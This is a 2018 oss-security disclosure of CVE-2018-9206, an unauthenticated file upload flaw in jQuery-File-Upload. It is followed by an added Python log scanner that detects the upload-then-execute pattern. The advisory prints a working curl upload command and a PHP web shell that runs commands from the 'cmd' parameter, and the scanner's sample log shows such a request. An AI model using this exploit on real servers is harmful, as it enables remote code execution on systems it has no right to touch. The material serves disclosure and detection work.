
List:       oss-security
Subject:    [oss-security] jQuery-File-Upload <= v9.22.0 unauthenticated
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2018-10-11 16:06:21
Message-ID: 70dba524-20af-4af3-9c45-698d762e1a4a () me ! com

Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-2018-9206]
Download Site: https://github.com/blueimp/jQuery-File-Upload/
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.

Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.


Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

Screen Shots:
Notes: Actively being exploited in the wild. https://github.com/blueimp/jQuery-File-Upload/pull/3514
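As an added example (not part of this advisory or of the jQuery-File-Upload project), a small Python scanner that flags the upload-then-execute pattern the advisory describes in combined-format web access logs. It assumes the PHP handler's default `files/` upload directory next to `server/php/index.php` and runs over constructed sample log lines, not real traffic.

```python
"""Flag CVE-2018-9206 style activity in combined-format access logs.

Two signals are reported: a POST to the PHP upload handler, and any request for a
file with a server-side script extension inside the handler's upload directory.
Assumption: uploads land under server/php/files/ (the handler's default); adjust
SCRIPT_IN_UPLOAD_RE if the deployment uses a different upload_dir.
"""
import re

# Combined/common log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
HANDLER_RE = re.compile(r"/server/php/(?:index\.php)?$")
SCRIPT_IN_UPLOAD_RE = re.compile(r"/server/php/files/.*\.(?:php\d?|phtml|phar)$", re.I)

# Constructed sample lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Oct/2018:16:06:21 +0000] "GET /jQuery-File-Upload-9.22.0/ HTTP/1.1" 200 5123
203.0.113.7 - - [11/Oct/2018:16:06:25 +0000] "POST /jQuery-File-Upload-9.22.0/server/php/index.php HTTP/1.1" 200 87
203.0.113.7 - - [11/Oct/2018:16:06:30 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/shell.php?cmd=id HTTP/1.1" 200 54
198.51.100.9 - - [11/Oct/2018:16:07:02 +0000] "POST /jQuery-File-Upload-9.22.0/server/php/index.php HTTP/1.1" 200 91
198.51.100.9 - - [11/Oct/2018:16:07:05 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/photo.jpg HTTP/1.1" 200 44310
"""


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def scan(lines):
    """Return findings in log order; script requests note whether the same IP uploaded earlier."""
    uploaders, findings = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and HANDLER_RE.search(rec["path"]):
            uploaders.add(rec["ip"])
            findings.append({"kind": "upload", "ip": rec["ip"], "path": rec["path"]})
        elif SCRIPT_IN_UPLOAD_RE.search(rec["path"]):
            findings.append({"kind": "script_in_upload_dir", "ip": rec["ip"], "path": rec["path"],
                             "status": rec["status"], "same_ip_uploaded": rec["ip"] in uploaders})
    return findings
```

A `script_in_upload_dir` finding with status 200 means the server actually served (and, for PHP, executed) the uploaded file, which is the condition the advisory warns about.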

